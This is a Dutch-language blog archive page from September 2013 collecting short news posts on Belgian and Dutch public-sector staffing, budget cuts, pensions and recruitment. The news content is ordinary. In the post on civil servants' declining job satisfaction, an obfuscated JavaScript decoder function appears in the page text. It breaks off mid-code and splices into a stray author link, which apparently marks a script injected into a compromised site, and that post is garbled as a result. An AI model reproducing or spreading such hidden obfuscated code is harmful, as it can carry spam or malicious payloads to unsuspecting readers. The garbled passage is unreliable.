Archief september, 2013

Reacties uitgeschakeld voor 50 ambtenaren minder bij provincie Limburg in 2014

50 ambtenaren minder bij provincie Limburg in 2014

Door | 28 september 2013 | Nieuws

Deputatie zet de tering naar de nering
vrijdag, 27 september 2013 – persbericht provincie Limburg
De afgelopen dagen bereikte de deputatie van de provincie Limburg een principieel akkoord over het budget voor 2014 en de financiële meerjarenplanning voor de jaren 2014-2019.

Dit was geen gemakkelijke opdracht, omdat een begroting volgens de nieuwe spelregels van de Vlaamse Overheid (De Beleids- en Beheerscyclus: BBC) aan twee strikte voorwaarden moet voldoen. Het resultaat op kasbasis moet jaarlijks positief zijn. En voor de gehele termijn moet ook de zogenaamde autofinanciering in orde zijn, wat wil zeggen dat er op het einde van de planningsperiode voldoende overschot moet zijn om de schuldenlast te kunnen betalen.

Tot dit jaar konden de opgebouwde reserves uit het verleden telkens ingebracht worden om de begroting sluitend te maken. Dit kan nu niet meer. Ook al omdat de vrije beschikbare reserve van 50 miljoen euro wordt ingezet om het provinciale deel van SALK te financieren.

Daarbovenop kwam de beslissing van de Vlaamse Regering vorige week – zonder enig overleg – om het provinciefonds te verminderen met 3,5 miljoen euro voor Limburg.

Dit is een ferme streep door de rekening, die al zo krap was.

Wat zijn de grote lijnen van het budget 2014 en de meerjarenplanning, die nu verder in detail wordt uitgewerkt en in november aan de provincieraad wordt voorgelegd ter goedkeuring?

– De algemene provinciebelasting bedrijven wordt verminderd met 1 miljoen euro om het progressief tarief voor grote bedrijven af te vlakken.

– De andere belastingen worden niet verhoogd.

- Door de sluiting van Ford en toeleveranciers wordt vanaf 2015 een minderontvangst van 2,4 miljoen euro aan belastingen verwacht.

- Het investeringsritme van voorgaande jaren wordt aangehouden: ongeveer 10 miljoen euro per jaar in gebouwen en gronden, 5 miljoen euro per jaar in materiaal en groot onderhoud, 1,5 miljoen euro per jaar in Bokrijk. Vanaf 2017 wordt een bijkomende investering van 1 miljoen euro voorzien in Bokrijk.

- De investering in en het onderhoud van de waterlopen wordt met 2 miljoen euro verhoogd, omdat de provincie een groot aantal waterlopen van 3de categorie overneemt van de gemeenten. Dit ingevolge de bevoegdheidsherverdeling van de interne staatshervorming.

- Het personeelsbestand zal met ongeveer 50 eenheden verminderen in 2014 en verder zal er een geleidelijke en natuurlijke afbouw van het personeelsbestand gebeuren, doordat de volgende jaren het aantal pensioengerechtigden slechts voor de helft wordt vervangen.

Deze laatste beslissing is een moeilijke beslissing die nog verder moet worden uitgewerkt en besproken met leidinggevenden en personeel. Zij is het rechtstreekse gevolg van de eenzijdige vermindering van het provinciefonds met 3,5 miljoen euro.

Het provinciefonds werd voor Limburg reeds met netto 4,5 miljoen euro verminderd door de zogenaamde ‘verevening’. Dit is de compensatie door Vlaanderen voor het wegvallen van subsidies die de provincie ingevolge de interne staatshervorming niet meer mag uitkeren. Het gaat om subsidies aan individuen en subsidies aan organisaties die reeds door Vlaanderen worden gesubsidieerd. Op zich is dit een nul operatie, want wat de provincie minder krijgt uit het provinciefonds, moet ze ook niet meer uitkeren aan subsidies.

De extra vermindering van het provinciefonds met 3,5 miljoen euro is echter geen nul operatie. Die snijdt rechtstreeks in de werking van het provinciebestuur.

De deputatie heeft besloten om de besparingen in personeel, werking en subsidies te zoeken in die bevoegdheden die door de interne staatshervorming in hoofdzaak aan Vlaanderen of de gemeenten zijn toegemeten. Dit zijn bevoegdheden op het vlak van sport, cultuur, jeugd, welzijn, mobiliteit, ruimtelijke ordening en milieu. Maar ook het provinciaal communicatiebudget wordt quasi gehalveerd.

De interne staatshervorming had het doel om de verdeling van bevoegdheden tussen de verschillende bestuursniveaus te vereenvoudigen, met zo weinig mogelijk overlap en dubbel werk. De deputatie van Limburg wil deze hervorming consequent doorvoeren. Ze wil zich focussen op de taken waarvoor de provincies volgens de decreten en het bestuursakkoord wel nog een rol van betekenis kunnen en mogen spelen. En de deputatie wil nog meer als vroeger op deze vlakken de Limburgse gemeenten ondersteunen, want ook zij krijgen het steeds moeilijker.

Zo hopen we met een kleinere bezetting en met minder middelen en minder belastingen toch nog een zinvol en efficiënt beleid te voeren in het belang van Limburg en de Limburgers.

Hasselt, 27 september 2013

De deputatie van Limburg,

Marc Vandeput, Ludwig Vandenhove, Igor Philtjens,

Frank Smeets, Jean-Paul Peuskens en Inge Moors

Reacties uitgeschakeld voor Post en spoor zien zware opdracht in vervangen vergrijsd personeel

Post en spoor zien zware opdracht in vervangen vergrijsd personeel

Door | 27 september 2013 | Nieuws

Bron: Het Belang van Limburg

27/09 BINNENLAND De vervanging van het personeel dat de komende 5 tot 10 jaar met pensioen gaat, vormt een kolossale uitdaging voor de post en de spoorwegmaatschappij. Dat zegt socioloog Jan Hertogen op basis van de statistieken bij deze overheidsbedrijven. Bij spoorwegmaatschappij NMBS is van de 36.389 werknemers 52 procent ouder dan 50 jaar, bijna een kwart is 55 jaar of ouder. Bij Bpost, met zijn 27.976 werknemers, is 38 procent 50 jaar of ouder en meer dan de helft is 45 jaar of ouder.
Volgens Bpost is 34 procent bij hen ouder dan 51, maar de andere cijfers worden door de twee overheidsbedrijven bevestigd. "De pensioneringsgolf is geen nieuw fenomeen", zegt Leen Uyterhoeven, woordvoerster van de NMBS-Holding. "Daarom werven we sinds enkele jaren tussen de 1.500 en 2.000 nieuwe mensen aan per jaar."

Lastige opdracht
Uyterhoeven geeft toe dat dit niet altijd een sinecure is. "Er zitten nogal wat technische profielen en knelpuntberoepen tussen en dan moeten we concurreren met andere werkgevers die dezelfde mensen zoeken, maar gelukkig is ons imago als werkgever vrij positief door de diversiteit van functies die we aanbieden en de doorgroeimogelijkheden."

"Voor Bpost zien we dit niet als een probleem, maar als een opportuniteit", zegt woordvoerder Fred Lens van Bpost. "Het is een nuttige context om via natuurlijk verloop efficiëntieherstructureringen door te voeren. De vervangingen zijn overigens niet stopgezet. Tegenover de 2.000 mensen die jaarlijks de post verlaten staan ook nieuwe aanwervingen, tussen de 800 en 1.200 per jaar."

Reacties uitgeschakeld voor Liefde ambtenaar voor werkgever bekoelt na 3 jaar

Liefde ambtenaar voor werkgever bekoelt na 3 jaar

Door | 26 september 2013 | Lectuur

Liefde Nederlandse ambtenaren voor hun werkgever bekoelt na 3 jaar.

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandsbestuur.nl/ambtenaar-en-carriere/nieuws/service/redacteuren/redacteuren/hans-bekkers.253846.lynkx" rel="author">Hans Bekkers   www.binnenlandsbestuurd.nl

Nieuwe gemeenteambtenaren zijn opvallend positiever over hun werkgever dan hun langer zittende collega’s. De mondhoeken hangen verreweg het meest naar beneden bij medewerkers van de grootste gemeenten.

8 of hoger

Ambtenaren geven hun eigen gemeente als werkgever gemiddeld een 6,5 als rapportcijfer. Een derde van de gemeenteambtenaren geeft de eigen werkgever een 8 of hoger, één op de vier ambtenaren een onvoldoende. Dat blijkt allemaal uit een enquête die Binnenlands Bestuur door onderzoeksbureau Team Vier heeft laten verrichten. Ruim 1.200 gemeenteambtenaren deden aan het onderzoek mee.

 

Sfeer en cultuur in gemeentehuis prima

Medewerkers zijn het meest tevreden over met name de sfeer en de cultuur in het gemeentehuis. Ook de organisatie van het werk scoort hoog. Minder enthousiast zijn de ambtenaren over de werkdruk. De besluitvorming krijgt een mager zesje. Echt onvoldoende in de ogen van de ambtenaren zijn met name management en organisatie: rapportcijfer 5,3.

 

Medewerkers van de gemeente blijken doorgaans niet bijzonder trots op hun werkgever (rapportcijfer 5,9). De gemeente betekent dan niet bijzonder veel voor ze, maar ook niet bijzonder weinig (5,8). Wellicht als gevolg daarvan vinden ze het niet heel fijn om met mensen van buiten het werk over het eigen werk te praten en hebben ze nauwelijks het gevoel deel uit te maken van een hechte organisatie (4,9).

Medewerkers blijken zeer te spreken over de mate waarin zij hun mening kunnen inbrengen tijdens het werkoverleg (7,9), maar des te minder over de impact van het gezegde: zo geeft men aan in geringe mate invloed te hebben op het te voeren beleid (4,7) en maar matig betrokken te worden bij beslissingen over belangrijke veranderingen op het werk (5,2).

 

Motivatie vooral bij nieuwe lichting hoog

Medewerkers die korter in dienst zijn dan drie jaar blijken aanzienlijk positiever dan medewerkers die drie jaar of langer in dienst zijn. Hoe korter men in dienst is, des te vaker men aangeeft dat de motivatie is toegenomen en des te hoger de motivatie momenteel is. Hetzelfde fenomeen doet zich overigens voor bij medewerkers met een leiding­gevende functie.

Waardering daalt
Medewerkers die korter dan drie jaar in dienst zijn, geven gemiddeld een 7. Wanneer men langer in dienst is, daalt deze waardering. Zij die drie tot tien jaar in dienst zijn, geven hun werkgever gemiddeld een 6,4. Ambtenaren die langer dan tien jaar in dienst zijn, geven gemiddeld een 6,5. Het lijkt er dus op dat de liefde tussen werkgever en werknemer ergens rond het derde jaar dat men in dienst is, bekoelt.

 

Reacties uitgeschakeld voor Aantal federale ambtenaren onder de 70 000

Aantal federale ambtenaren onder de 70 000

Door | 23 september 2013 | Nieuws

22/09/13, 16u22 − Bron: Belga

© photo news. Staatssecretaris van Ambtenarenzaken Hendrik Bogaert (CD&V)
Voor het eerst is het aantal federale ambtenarenbanen in de strikte zin onder de 70.000 gezakt. Dat zegt federaal staatssecretaris van Ambtenarenzaken Hendrik Bogaert (CD&V) en dat is ook te controleren in de databank van het federaal overheidspersoneel. Het gaat over de ministeries en parastatalen. Decennia lang hadden zij rond de 90.000 personeelsleden. Dat staat vandaag te lezen op de website van De Standaard.

De 'speciale' korpsen, zoals het leger en de magistraten, zijn daarin niet meegerekend. Daarvoor zijn er ook nog geen cijfers voor juni 2013, maar hun aantal is vorig jaar ook gedaald, en wel tot minder dan 60.000. Eind juni 2008 waren er, omgerekend naar voltijdse eenheden (VTE's) 74.102 ambtenaren aan het werk in de federale ministeries en parastatalen en 66.584 in de bijzondere korpsen (leger, magistratuur), samen 140.686.

Vier jaar later, eind juni 2012, waren er nog 70.554 in de ministeries en parastatalen (3.700 minder) en nog 58.928 in de bijzondere korpsen (7.500 minder). Samen waren dat er nog 129.497 of ruim 11.000 minder dan in 2008. Voor de ministeries en parastatalen zijn de cijfers intussen verder gedaald tot 69.400, nog eens 1.200 minder.

De daling ligt hoger sinds het aantreden van de regering Di Rupo dan voordien. Dat Bogaert net nu hierover communiceert is geen toeval. Vorige week maakte de Antwerpse burgemeester Bart De Wever (N-VA) bekend dat zijn stad het in de toekomst met 7 procent minder ambtenaren zal doen. "De federale regering wil aantonen dat ook zij werkt aan een slanker overheidsapparaat", stelt de krant.

Reacties uitgeschakeld voor Woordenwisseling over pensioen lokale ambtenaren

Woordenwisseling over pensioen lokale ambtenaren

Door | 20 september 2013 | Nieuws

VVSG verrast over “brutaal taalgebruik” Bourgeois
Belga
vr 20/09/2013 – 12:24 Belga
Het “brutale taalgebruik” van Vlaams minister van Binnenlands Bestuur Geert Bourgeois (N-VA) met betrekking tot de pensioenkosten van de lokale ambtenaren is slecht gevallen bij de VVSG, de Vereniging van Vlaamse Steden en Gemeenten. VVSG-voorzitter Luc Martens waarschuwt dat een aantal burgemeesters "zenuwachtig" worden.
"Burgemeesters zijn doorgaans hoffelijk en beleefd, maar ik ken een aantal collega's die zenuwachtig aan het worden zijn. Het taalgebruik van Bourgeois is niet van die aard om de gemoederen te bedaren", zegt VVSG-voorzitter en burgemeester van Roeselare Luc Martens tegen het persagentschap Belga.

In een persbericht rekent de VVSG voor dat de Vlaamse gemeenten, OCMW's en politiezones 700 miljoen euro minder zouden moeten betalen voor de financiering van de pensioenen van hun ambtenaren als ze onder hetzelfde pensioenregime als de federale of de Vlaamse overheid zouden vallen.

De lokale besturen staan, in tegenstelling tot Vlaanderen en het federale niveau, helemaal zelf in voor de pensioenen van hun statutaire ambtenaren. Het cijfer van 700 miljoen euro is gebaseerd op de werkgeversbijdragen die zij in 2012 moesten betalen. Omdat die bijdrage de komende jaren zal toenemen, zal het verschil tussen de lokale en de anderen besturen nog groter worden, luidt het.

In een interview in De Standaard herhaalt minister Bourgeois vandaag nog eens dat Vlaanderen niet zal bijspringen. "De gemeenten moeten hun eigen boontjes doppen", stelt hij. Volgens VVSG-voorzitter Luc Martens staat die uitspraak haaks op het gesprek dat hij woensdag met de minister had. Bourgeois was toen erg luisterbereid, zegt hij.

Hij wijst erop dat de lokale besturen heel wat ambtenaren aangetrokken hebben omdat dat hen van bovenaf was opgelegd. "Neem nu de ambtenaren bevoegd voor culturele minderheden. Hun loon wordt wel gesubsidieerd, maar wij moeten wel hun pensioenen betalen", schetst Martens.

Hij vraagt dat de Vlaamse overheid "minstens een bondgenootschap" aangaat met de steden en gemeenten. "Het gaat om een gedeelde verantwoordelijkheid."

Reacties uitgeschakeld voor Vlaamse bibliotheken kampen met bezuinigingen

Vlaamse bibliotheken kampen met bezuinigingen

Door | 20 september 2013 | Nieuws

19-09-2013
Uit onderzoek van de Vlaamse Vereniging voor Bibliotheek, Archief en Documentatie (VVBAD) blijkt dat ook in Vlaanderen openbare bibliotheken te maken krijgen met soms fikse bezuinigingen.
De VVBAD trekt deze conclusie op basis van een deze zomer uitgevoerde enquête, bedoeld om te inventariseren in hoeverre Vlaamse bibliotheken te lijden hebben onder bezuinigingen. De resultaten van deze zogeheten 'besparingsmonitor' werden vorige week bekendgemaakt bij de start van het tweejaarlijkse VVBAD-congres Informatie aan Zee

Aan de enquête namen 125 Vlaamse openbare bibliotheken deel, waarvan de helft aangeeft bij het opstellen van de begroting voor 2013 rekening te moeten houden met bezuinigingen, zo meldt de VVBAD. Bij drie op de tien van de getroffen bibliotheken bedraagt de bezuiniging meer dan 10 procent van het budget. Op sommige plaatsen (4 procent van de gevallen) gaat het zelfs om een bezuiniging van meer dan 20 procent, aldus de VVBAD.

De VVBAD heeft ook gevraagd op welke aspecten van de dienstverlening bezuinigd wordt. In 40% van de bibliotheken wordt bezuinigd op de collectie. Bij een op de zeven bibliotheken gaat het om een bezuiniging op het collectiebudget met meer dan 10 procent.
Ook de werkingsbudgetten en de investeringsbudgetten staan bij ongeveer de helft van de instellingen onder druk. Bij een kwart van de openbare bibliotheken was het personeelsbestand op 1 januari 2013 gekrompen ten opzichte van 1 januari 2012. Alarmerend is volgende de VVBAD dat 20 procent van de bibliotheken meldt dat statutair personeel bij uitdiensttreding niet vervangen zal worden. Bij contractuele medewerkers loopt dat op tot 30 procent.

De VVBAD noemt de vooruitzichten somber. Een vierde van de instellingen heeft al zicht op de budgetten voor volgend jaar. Twee derde van hen verwacht verdere bezuinigingen in 2014. De ontwikkeling van verminderde financiële middelen is ook al een tijdje aan de gang. De subsidies van de Vlaamse overheid werden in 2011 en 2012 niet geïndexeerd.

Overigens bracht de VVBAD onlangs ook een memorandum naar buiten met het oog op de Vlaamse, federale, en Europese verkiezingen in 2014, getiteld 'Bouwstenen voor de bibliotheek en het archief van de toekomst.' De Vlaamse beroepsvereniginging noemt hierin tien punten die wat haar betreft prioriteit zouden moeten hebben:
Vlaams niveau:
1. Bibliotheek- en archiefopleidingen op bachelor- en master-niveau realiseren;
2. De effecten van de beleidsprioriteiten en de beleid- en beheerscyclus evalueren en zo nodig bijsturen;
3. Het Vlaams E-boekplatform structureel financieren en uitbouwen;
4. Erfgoedbibliotheken uitbouwen tot een volwaardige sector binnen het Cultureel-erfgoeddecreet;
5. Een actieve rol opnemen bij de realisatie van één consortium voor de aankoop van elektronische informatie;
6. Gelijke toegang tot informatie garanderen voor onderzoekers en studenten;
Vlaams en federaal niveau
7. Een definitieve regeling uitwerken voor het opstellen van selectielijsten;

Vlaams, federaal en Europees niveau:
8. Werk maken van een auteursrecht in balans;
9. Een openaccessbeleid ontwikkelen en daarvoor de nodige middelen voorzien;

Federaal en Europees niveau:
10. Het btw-tarief op elektronische publicaties verlagen

In een uitgebreide toelichting gaat de VVBAD uitgebreider in op de aspecten die volgens haar belangrijk zijn. Zie hier voor een pdf-versie van het Memorandum.

Reacties uitgeschakeld voor Stedenbouwkundige op lijst knelpuntberoepen

Stedenbouwkundige op lijst knelpuntberoepen

Door | 13 september 2013 | Nieuws

-Eigen berichtgeving-

De VDAB heeft de functie van stedenbouwkundige op de lijst van knelpuntberoepen geplaatst. De beleidsruimte van de gemeenten op het gebied van ruimtelijke ordening is het voorbije decennium sterk uitgebreid. Daardoor ontstond er een specifieke vraag naar stedenbouwkundigen. Bij de rekrutering van stedenbouwkundige ambtenaren concurreren de gemeenten met private stedenbouwkundige bureaus die met interessante voorwaarden zwaaien.

In 2012 waren er bij de VDAB 74 vacatures bekend.

Een aantal besturen hebben dit reeds begrepen. Na vaak een aantal mislukte adverteerpogingen, gingen zij over naar direct search via één van de gespecialiseerde bureaus terzake. Afhankelijk van de specifieke regio bedragen de kosten hiervoor 5 à 7000 EUR.

 

 

Reacties uitgeschakeld voor Personeelsbesparing bij de Vlaamse Overheid: stand van zaken (juli 2013)

Personeelsbesparing bij de Vlaamse Overheid: stand van zaken (juli 2013)

Door | 11 september 2013 | Nieuws

Bron: www.bestuurszaken.be

De Vlaamse Regering heeft de Vlaamse administratie opgedragen besparingen te realiseren, zowel op vlak van personeel als op het vlak van budgetten.

Daarbij moeten volgende besparingsdoelstellingen gerealiseerd worden:

de vermindering van het personeelsbestand van de Vlaamse overheid met 6%. Deze besparing – te realiseren in de periode 2009 - 2014 werd in 2012 van 5% verhoogd naar 6%.
de besparing van 60 miljoen euro op vlak van de personeelsgerelateerde kredieten in de begrotingsjaren 2012-2014. Ook deze besparing werd in februari 2012 verhoogd (van 50 miljoen euro naar 60 miljoen euro).

Binnen elk beleidsdomein bepalen de leidend ambtenaren zelf op welke manier zij deze besparingen onderling verdelen en realiseren. De besparingen moeten gebeuren zonder naakte ontslagen.

Om de begroting 2013 in evenwicht te houden, legde de Vlaamse Regering ten slotte in september 2012 nog verdere, bijkomende besparingsmaatregelen op van 1% op de personeelskosten aan de Vlaamse administratie en aan het Vlaams onderwijs. Voor de Vlaamse administratie besliste de Vlaamse Regering na onderhandelingen met de representatieve vakorganisaties om binnen de diensten Vlaamse overheid onder andere geen functioneringstoelagen of managementtoelagen uit te keren in 2013 en 2014 en om het voorzien budget voor de uitvoering van het sectoraal akkoord 2013-2014 te besteden aan deze personeelsbesparing. Naast deze bijdrage van 11,7 miljoen door de diensten Vlaamse overheid werd ook 4,4 miljoen euro bespaard op dotatie aan De Lijn.

Stand van zaken personeelsbesparing (juli 2013)

De evolutie van de uitvoering van de besparingen wordt twee keer per jaar in kaart gebracht. Onderstaande grafiek toont in welke mate de 6%-besparing in uitvoering is.
Gerealiseerde personeelsbesparing 6%

De instroom op 1/1/2011 van het contingent van 281 federale ambtenaren zijn retroactief meegeteld op 31/12/2009, 30/06/2010 en 31/12/2010 om een vertekende interpretatie van de besparingsinspanningen te voorkomen (gezien de principiele beslissing in 2008 reeds was genomen). De 6%-besparing is ook van toepassing op deze personeelsgroep.

In de drie opeenvolgende budgettaire jaren (2012-2014) wordt telkens 20 miljoen euro bespaard. Op basis van een consensus binnen de Vlaamse administratie over de wijze waarop deze besparing wordt verdeeld, is vastgelegd hoeveel elk beleidsdomein precies zal bijdragen.

Deze verdeling is gebaseerd op twee parameters: het personeelsbudget voor 2012 en de mate waarin de organisaties en de beleidsdomeinen op 31 december 2011 (al dan niet) op koers zaten om de verwachte 6%-personeelsbesparing te realiseren. De te besparen middelen zullen in 2013 en 2014 bij begrotingsopmaak worden verrekend.

Reacties uitgeschakeld voor Arbeidsmarktpositie van personen van Belgische en van vreemde afkomst in beeld

Arbeidsmarktpositie van personen van Belgische en van vreemde afkomst in beeld

Door | 7 september 2013 | Lectuur

(Bron: Socio-economische Monitoring, september 2013 , Publicatiedatum: 6-9-2013 )

De Federale Overheidsdienst (FOD) Werkgelegenheid, Arbeid en Sociaal Overleg (WASO) en het Centrum voor gelijkheid van kansen en voor racismebestrijding stelden gezamenlijk het eerste rapport socio-economische monitoring voor.
​Dit rapport beoogt de positie van de personen op de arbeidsmarkt te belichten in functie van hun afkomst of historische migratie.

Uit de beschrijvende analyses blijkt onder meer dat personen van Belgische origine de hoogste activiteits- en werkgelegenheidsgraad vertonen. Bovendien zijn ze oververtegenwoordigd in de betere jobs en wanneer ze niet aan het werk zijn, zitten ze zelden in de niet-vergoede inactiviteit. Van alle andere origines zijn het personen met een EU-origine die de betere arbeidsmarktintegratie vertonen. Voor alle overige origines is de werkgelegenheidsgraad minder dan 50 %.

De bedoeling is om jaarlijks de situatie van werknemers van vreemde origine op de arbeidsmarkt in kaart te brengen en op termijn de impact van het arbeidsmarktbeleid op de verschillende originegroepen die in België werkzaam zijn te evalueren.

U kunt het volledige rapport Socio-economische Monitoring downloaden via de website van de FOD Werkgelegenheid, Arbeid en Sociaal Overleg of via de website van het Centrum voor gelijkheid van kansen en voor racismebestrijding.

Voor bijkomende informatie kunt u contact opnemen met de FOD Werkgelegenheid, Arbeid en Sociaal Overleg op het telefoonnummer 02 233 41 11. U kunt eveneens het Centrum voor gelijkheid van kansen en voor racismebestrijding contacteren op het telefoonnummer 02 212 30 00.

Myriam Vanweddingen

Reacties uitgeschakeld voor Geen Frans meer aan gemeenteloket Menen

Geen Frans meer aan gemeenteloket Menen

Door | 5 september 2013 | Nieuws

Bewerkt door: DE VOLKSKRANT (NL) redactie − 04/09/13, 17:09 − bron: ANP
Ambtenaren in het Vlaamse stadje Menen, vlakbij de Franse grens, mogen burgers alleen nog maar in het Nederlands te woord staan. In de praktijk schakelen ambtenaren over op het Frans om Walen of Fransen, die een minderheid in het stadje vormen, te helpen. Een doorn in het oog van de burgemeester van Menen, Martine Fournier.

Zij heeft het personeel op het stadhuis gesommeerd enkel en alleen Nederlands te spreken. Vanaf 1 januari gaan de strengere taalregels gelden. 'Op deze manier wordt respect afgedwongen voor het Nederlands', aldus Fournier.

Zo mag er nooit automatisch overgeschakeld worden naar een andere taal en moet er ook in probleemsituaties gewoon Nederlands worden gesproken. Pictogrammen of gebaren moeten eventueel duidelijkheid bieden mocht de burger in kwestie geen Nederlands verstaan. Bij hoge uitzondering mag er overgestapt worden op een andere taal.

Deze maatregelen kan de burgemeester invoeren door de Belgische taalwet. Daarin is geregeld dat er in Vlaanderen Nederlands wordt gesproken en dat in Wallonië Frans de voertaal is. Brussel is officieel tweetalig. In de randgemeenten van Brussel, die in Vlaanderen liggen, maar waar de bewoners voor het overgrote deel Franstalig zijn, mag ook Frans gesproken worden naast het Nederlands.

De regels reiken ver. Reclameboodschappen op de bussen van de Vlaamse busmaatschappij De Lijn mogen alleen in het Nederlands. En de nationale spoorwegen NMBS zijn verplicht de informatie in de treinen om te roepen in de taal van het landsdeel waar de trein zich op dat moment bevindt. Dat betekent voor de trein tussen Antwerpen en Charleroi, die ook door Brussel gaat, dat er eerst enkel in het Nederlands, vervolgens in beide landstalen, dan weer enkel in het Nederlands en daarna enkel nog in het Frans wordt omgeroepen.

Reacties uitgeschakeld voor Waarom geraken vacatures bij een eerste oproep niet ingevuld ?

Waarom geraken vacatures bij een eerste oproep niet ingevuld ?

Door | 3 september 2013 | Rekrutering en selectie

Eigen redactie.

Ondanks de grote interesse om te werken bij de overheid, geraken een aantal vacatures niet opgevuld.

Een  korte rondvraag op 30 augustus , brengt een aantal functies in kaart waar momenteel een 2de oproep voor loopt: financieel beheerder, informaticus, leidinggevend personeel bij de brandweer, medewerker stedenbouw,...

Hierbij alvast enkele redenen en tips:

1/ De arbeidsmarkt

De eisen die gesteld worden aan bepaalde functies zijn niet zomaar vindbaar op de arbeidsmarkt. Voor bepaalde topfuncties (bv. financieel beheerder) zijn de verwachtingen ook aanzienlijk veranderd. Ook de klassieke knelpuntberoepen (zorg, onderwijs) blijven een probleem voor de overheid. Het aantal kandidaten hiervoor is dus ook beperkt.

2/ De periode van rekruteren

Het valt op dat momenteel een aantal functies vacant zijn, waarvoor net voor de vakantieperiode werd geadverteerd. Geen ideale periode alleszins. Analyse van het zoekgedrag van kandidaten, geeft alvast voorrang aan september.

 

3/ De rekruteringskanalen en -communicatie

De overheid maakt meestal gebruik van de nationale en regionale kranten. Voor een aantal functies zijn deze media minder geschikt. Een aangepaste mix van kanalen aangepast aan de functie is aangewezen.

Ook de wijze waarop wordt gecommuniceerd over de functie is nog aan verbetering toe. Soms krijgen kandidaten een lijst van procedures en voorwaarden, ipv een goede omschrijving van de functie-inhoud.

 

 

Reacties uitgeschakeld voor NMBS-topman Jannie Haek geeft ontslagvergoeding op

NMBS-topman Jannie Haek geeft ontslagvergoeding op

Door | 3 september 2013 | Nieuws

Bron: De Redactie
ma 02/09/2013 – 20:11 Jos De GreefJannie Haek, ontslagnemend CEO van de NMBS Holding, zegt dat hij geen aanspraak maakt op de ontslagvergoeding van 750.000 euro die hem contractueel is toegezegd. Haek wordt topman van de Nationale Loterij.

Over de ontslagvergoedingen van de huidige toplui van de NMBS was veel te doen en onder meer minister van Overheidsbedrijven Jean-Pascal Labille had de ontslagnemende toplui van de NMBS gevraagd om af te zien van hun riante vergoedingen.

In Terzake vanavond kondigde Jannie Haek, de CEO van de overkoepelende NMBS Holding, aan dat “er geen haar op zijn hoofd dacht aan het opnemen van die opzegvergoeding”. Die bedroeg contractueel 750.000 euro of 18 maanden wedde.

Hij heeft daar weliswaar recht op en Haek verdedigt ook dat recht omdat die vergoeding bedoeld is om enige zekerheid te bieden omdat er in de politiek veel kan veranderen.

Toch wil hij die ontslagvergoeding niet opeisen, omdat hij een nieuwe functie krijgt als CEO van de Nationale Loterij, een functie die ook niet slecht betaald wordt, geeft Haek toe.

Of de andere opstappende overheidsmanagers en politici die een bestuursmandaat krijgen, nu ook hun ontslagvergoedingen laten vallen, is nog niet duidelijk.

Haek gaf overigens toe dat hij liever topman bij de NMBS was gebleven, maar mikte ook op de functie als baas van de Nationale Loterij, een job die hij binnenkort zal invullen. Wel zal hij daar minder verdienen dan bij de NMBS. Haek is overigens sinds 2003 regeringscommissaris bij de Nationale Loterij en zegt dat hij dat bedrijf goed kent.